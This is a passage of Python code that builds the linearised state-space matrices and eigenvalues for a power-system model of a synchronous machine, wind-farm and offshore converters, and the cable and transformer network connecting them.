npr.wn * off.Kif * off.Kpc * off.Kpp / off.Lt, npr.wn * off.Kip * off.Kpc / off.Lt, 0,
-npr.wn * off.Kpc * off.Kpp / off.Lt, 0, 0,
npr.wn * (off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.sin(thetao) - np.cos(thetao)) / off.Lt,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.cos(thetao) - np.sin(thetao)) / off.Lt, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt,
npr.wn * (voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Lt, 0, 0, 0,
npr.wn * off.Kiq * off.Kpc / off.Lt, 0, npr.wn * off.Kpc * off.Kpq * off.Kq / off.Lt,
npr.wn * off.Kpc * off.Kpq * off.Kv / off.Lt, npr.wn * np.sin(thetao) / off.Lt,
-npr.wn * np.cos(thetao) / off.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * off.Kpp * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)),
-off.Ki_pll * off.Kpf * off.Kpp, off.Kif * off.Kpp, off.Kip, 0, -off.Kpp, 0, 0,
off.Kp_pll * off.Kpf * off.Kpp * np.sin(thetao), -off.Kp_pll * off.Kpf * off.Kpp * np.cos(thetao), 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0,
off.Kiq, 0, off.Kpq * off.Kq, off.Kpq * off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / off.Tad, 0,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
np.cos(thetao) / off.Tad, np.sin(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / off.Tad,
(-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
-np.sin(thetao) / off.Tad, np.cos(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), npr.wn * off.Ki_pll, 0, 0,
0, 0, 0, 0, -npr.wn * off.Kp_pll * np.sin(thetao), npr.wn * off.Kp_pll * np.cos(thetao), 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-voffx * np.cos(thetao) - voffy * np.sin(thetao), 0, 0, 0, 0, 0, 0, 0, -np.sin(thetao),
np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll, 0, 0, 0, 0, 0, 0,
off.Kp_pll * np.sin(thetao), -off.Kp_pll * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll * off.Kpf,
off.Kif, 0, 0, -1, 0, 0, off.Kp_pll * off.Kpf * np.sin(thetao),
-off.Kp_pll * off.Kpf * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, off.Kq, off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Tpm,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.sin(thetao) + voffy * np.cos(thetao)) + Iqo * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao))) / off.Tpm, 0, 0, 0, 0,
-1 / off.Tpm, 0, 0, (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm,
(Ido * np.sin(thetao) + Iqo * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm,
(-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)) - Iqo * (
-voffx * np.sin(thetao) + voffy * np.cos(thetao))) / off.Tpm, 0, 0, 0, 0, 0,
-1 / off.Tpm, 0, (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / off.Tpm,
(Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * voffx * np.sin(thetao) + 2 * voffy * np.cos(thetao)) * (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) / 2 + (
-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * (
-2 * voffx * np.cos(thetao) - 2 * voffy * np.sin(thetao)) / 2) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0,
-1 / off.Tvm, (-(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.sin(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.cos(thetao)) / (off.Tvm * np.sqrt(
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), (
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.cos(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.sin(thetao)) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb),
-npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Chub, 0, npr.wn / Chub, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb),
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, -npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Chub, 0, npr.wn / Chub, 0, 0],
[gpr.Sn * npr.wn * ((-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (-gpr.ra * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta))) * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta)) - gpr.xqpp * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta))) * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta)) + gpr.xdpp * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta))) * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (
Csc * npr.Sb), 0, 0, gpr.Sn * npr.wn * (
-gpr.ra * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xqpp * np.cos(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, gpr.Sn * npr.wn * (
gpr.ra * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xdpp * np.sin(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, gpr.Sn * npr.wn * (
-(gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * np.cos(delta) + gpr.xqpp * np.sin(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), npr.wn * (gpr.Sn * (
(-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / npr.Sb + Csc) / Csc, 0, 0, 0, 0,
-npr.wn / Csc, 0, 0, 0, 0, 0],
[gpr.Sn * npr.wn * ((-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (-gpr.ra * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta))) * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta)) - gpr.xqpp * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta))) * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta)) + gpr.xdpp * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta))) * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (
Csc * npr.Sb), 0, 0, gpr.Sn * npr.wn * (
gpr.ra * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xqpp * np.sin(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, gpr.Sn * npr.wn * (
gpr.ra * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - gpr.xdpp * np.cos(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (gpr.Sn * (
(gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * np.cos(delta) + gpr.xqpp * np.sin(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / npr.Sb - Csc) / Csc, gpr.Sn * npr.wn * (
(-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, 0, 0, 0, 0,
-npr.wn / Csc, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, -npr.wn / Ccb, 0, npr.wn / Ccb, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, -npr.wn / Ccb, 0, npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb),
-npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, -npr.wn / Ccb,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb),
npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0,
-npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, -npr.wn / Ltsc, 0, npr.wn / Ltsc, 0, 0, 0, 0, 0, -Rtsc * npr.wn / Ltsc, npr.wn, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, -npr.wn / Ltsc, 0, npr.wn / Ltsc, 0, 0, 0, 0, -npr.wn, -Rtsc * npr.wn / Ltsc, 0, 0, 0,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, 0, 0, -Rtwf * npr.wn / Ltwf, npr.wn, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, 0, -npr.wn, -Rtwf * npr.wn / Ltwf, 0,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, -npr.wn / Lcb, 0, npr.wn / Lcb, 0, 0, 0, 0, 0, -Rcb * npr.wn / Lcb, npr.wn],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, -npr.wn / Lcb, 0, npr.wn / Lcb, 0, 0, 0, 0, -npr.wn, -Rcb * npr.wn / Lcb],
])
# A[6,:] = A[6,:]*0
# A[7,:] = A[7,:]*0
# A[8,:] = A[8,:]*0
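    # (leftover debugging hooks above: zeroing those rows freezes the
    # corresponding machine-state dynamics when isolating a subsystem)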
B = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0],
[0, -npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt],
[wf.Kpp, 0],
[0, -wf.Kpq * wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 0],
[0, -wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
])
    C = np.zeros((2, 51))  # placeholder output map; unused while the feedthrough term below stays disabled
D = np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
    Amat = A  # feedthrough correction -B@np.linalg.inv(D)@C left disabled
lambda_1, Phi_1 = np.linalg.eig(Amat)
    lambda_1[np.abs(lambda_1) < 1e-7] = 0  # suppress numerically spurious near-zero eigenvalues
return lambda_1, Amat, A, B, C, D
def nswph_linear3(x0, u, npr, off, wf, gpr):
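    # Linearised small-signal model of the hub system: a synchronous machine
    # (gpr), a wind-farm converter (wf), an offshore converter (off) and the
    # connecting transformer/cable network, evaluated at the operating point
    # x0. Returns (eigenvalues, Amat, A, B, C, D).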
delta = x0[gpr.x_idx['d']]
w = x0[gpr.x_idx['w']]
psi_d = x0[gpr.x_idx['psi_d']]
psi_q = x0[gpr.x_idx['psi_q']]
psi_fd = x0[gpr.x_idx['psi_fd']]
psi_1d = x0[gpr.x_idx['psi_1d']]
psi_1q = x0[gpr.x_idx['psi_1q']]
psi_2q = x0[gpr.x_idx['psi_2q']]
i_dg = x0[gpr.x_idx['Id']]
i_qg = x0[gpr.x_idx['Iq']]
Idw = x0[gpr.nx + wf.x_idx['Id']]
Iqw = x0[gpr.nx + wf.x_idx['Iq']]
thetaw = x0[gpr.nx + wf.x_idx['Theta']]
# Mpll = x0[7]
# ilx = x0[12]
# ily = x0[13]
# vd = x0[14]
# vq = x0[15]
Ido = x0[gpr.nx + wf.nx + off.x_idx['Id']]
Iqo = x0[gpr.nx + wf.nx + off.x_idx['Iq']]
thetao = x0[gpr.nx + wf.nx + off.x_idx['Theta']]
inw = gpr.nx + wf.nx + off.nx
voffx = x0[inw + 0]
voffy = x0[inw + 1]
vscx = x0[inw + 2]
vscy = x0[inw + 3]
vx2 = x0[inw + 4]
vy2 = x0[inw + 5]
vwfx = x0[inw + 6]
vwfy = x0[inw + 7]
itscx = x0[inw + 8]
itscy = x0[inw + 9]
itwfx = x0[inw + 10]
itwfy = x0[inw + 11]
icbx = x0[inw + 12]
icby = x0[inw + 13]
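    # Lumped network parameters (per unit). Interpretation, not stated in the
    # source: the /2 on Ccb suggests a pi-section cable model, and the /3 and
    # /8 divisors suggest parallel transformer units on the two sides.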
Csc = 0.01
Chub = 0.01
Lcb = 0.002103529614325069
Rcb = 0.0014730639731404956
Ccb = 0.4269650611647936 / 2
Ltsc = 0.15 / 3
Rtsc = 0.01 / 3
Ltwf = 0.15 / 8
Rtwf = 0.01 / 8
A = np.array([[0, npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, (-gpr.dkd - gpr.dpe / w + gpr.dpe * (w - 1) / w ** 2) / gpr.Tj, -i_qg / (gpr.Tj * gpr.cosn),
i_dg / (gpr.Tj * gpr.cosn), 0, 0, 0, 0, psi_q / (gpr.Tj * gpr.cosn), -psi_d / (gpr.Tj * gpr.cosn), 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[npr.wn * (-vscx * np.sin(delta) + vscy * np.cos(delta)), npr.wn * psi_q, 0, npr.wn * w, 0, 0, 0, 0,
gpr.ra * npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, npr.wn * np.cos(delta), npr.wn * np.sin(delta), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[npr.wn * (-vscx * np.cos(delta) - vscy * np.sin(delta)), -npr.wn * psi_d, -npr.wn * w, 0, 0, 0, 0, 0,
0, gpr.ra * npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, -npr.wn * np.sin(delta), npr.wn * np.cos(delta), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.rfd * gpr.x1d_loop * npr.wn / gpr.xdet_d,
-gpr.rfd * npr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d, 0, 0, -gpr.kfd * gpr.rfd * npr.wn, 0,
gpr.rfd * npr.wn / gpr.xadu, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.r1d * npr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d,
-gpr.r1d * gpr.xfd_loop * npr.wn / gpr.xdet_d, 0, 0, -gpr.k1d * gpr.r1d * npr.wn, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r1q * gpr.x2q_loop * npr.wn / gpr.xdet_q,
-gpr.r1q * npr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q, 0, -gpr.k1q * gpr.r1q * npr.wn, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r2q * npr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q,
-gpr.r2q * gpr.x1q_loop * npr.wn / gpr.xdet_q, 0, -gpr.k2q * gpr.r2q * npr.wn, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0],
[npr.wn * (vscx * np.sin(delta) - vscy * np.cos(delta)) / gpr.xdpp,
npr.wn * (-gpr.k1q * psi_1q - gpr.k2q * psi_2q + gpr.xqpp * i_qg) / gpr.xdpp, 0, 0, npr.wn * (
-gpr.k1d * gpr.r1d * (
-gpr.xad - gpr.xrld) / gpr.xdet_d - gpr.kfd * gpr.rfd * gpr.x1d_loop / gpr.xdet_d) / gpr.xdpp,
npr.wn * (-gpr.k1d * gpr.r1d * gpr.xfd_loop / gpr.xdet_d - gpr.kfd * gpr.rfd * (
-gpr.xad - gpr.xrld) / gpr.xdet_d) / gpr.xdpp, -gpr.k1q * npr.wn * w / gpr.xdpp,
-gpr.k2q * npr.wn * w / gpr.xdpp,
npr.wn * (-gpr.k1d ** 2 * gpr.r1d - gpr.kfd ** 2 * gpr.rfd - gpr.ra) / gpr.xdpp,
gpr.xqpp * npr.wn * w / gpr.xdpp, gpr.kfd * gpr.rfd * npr.wn / (gpr.xadu * gpr.xdpp), 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-npr.wn * np.cos(delta) / gpr.xdpp, -npr.wn * np.sin(delta) / gpr.xdpp, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0],
[npr.wn * (vscx * np.cos(delta) + vscy * np.sin(delta)) / gpr.xqpp,
npr.wn * (gpr.k1d * psi_1d + gpr.kfd * psi_fd - gpr.xdpp * i_dg) / gpr.xqpp, 0, 0,
gpr.kfd * npr.wn * w / gpr.xqpp, gpr.k1d * npr.wn * w / gpr.xqpp, npr.wn * (
-gpr.k1q * gpr.r1q * gpr.x2q_loop / gpr.xdet_q - gpr.k2q * gpr.r2q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q) / gpr.xqpp, npr.wn * (-gpr.k1q * gpr.r1q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q - gpr.k2q * gpr.r2q * gpr.x1q_loop / gpr.xdet_q) / gpr.xqpp,
-gpr.xdpp * npr.wn * w / gpr.xqpp,
npr.wn * (-gpr.k1q ** 2 * gpr.r1q - gpr.k2q ** 2 * gpr.r2q - gpr.ra) / gpr.xqpp, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * np.sin(delta) / gpr.xqpp, -npr.wn * np.cos(delta) / gpr.xqpp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te), 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, vscx / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)),
